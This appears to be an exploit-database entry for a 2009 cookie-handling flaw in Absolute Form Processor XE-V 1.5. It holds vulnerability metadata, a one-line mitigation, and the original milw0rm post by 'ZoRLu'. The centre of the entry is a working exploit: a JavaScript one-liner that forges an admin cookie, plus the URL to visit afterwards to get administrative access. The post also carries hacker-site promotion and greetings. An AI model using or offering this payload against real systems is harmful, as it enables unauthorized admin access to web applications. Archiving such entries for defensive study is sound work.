Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln

vendor:

Absolute Form Processor XE-V

by:

ZoRLu

7,5

CVSS

HIGH

Insecure Cookie Handling

614

CWE

Product Name: Absolute Form Processor XE-V

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: NO

Related CWE: N/A

CPE: a:xigla_software_solutions:absolute_form_processor_xe-v

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln

An attacker can exploit this vulnerability by setting a malicious cookie using the javascript code: javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/"; and then accessing the URL http://www.xigla.com/absolutefp/demo/menu.asp.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.

Source

Exploit-DB raw data:

[~] Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 11.04.2009
[~]
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com
[~]
[~] msn: trt-turk@hotmail.com
[~] 
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------

exploit: 

javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/";

after you go here:

http://www.xigla.com/absolutefp/demo/menu.asp


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone
[~]
[~] yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org / dafgamers.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-04-24]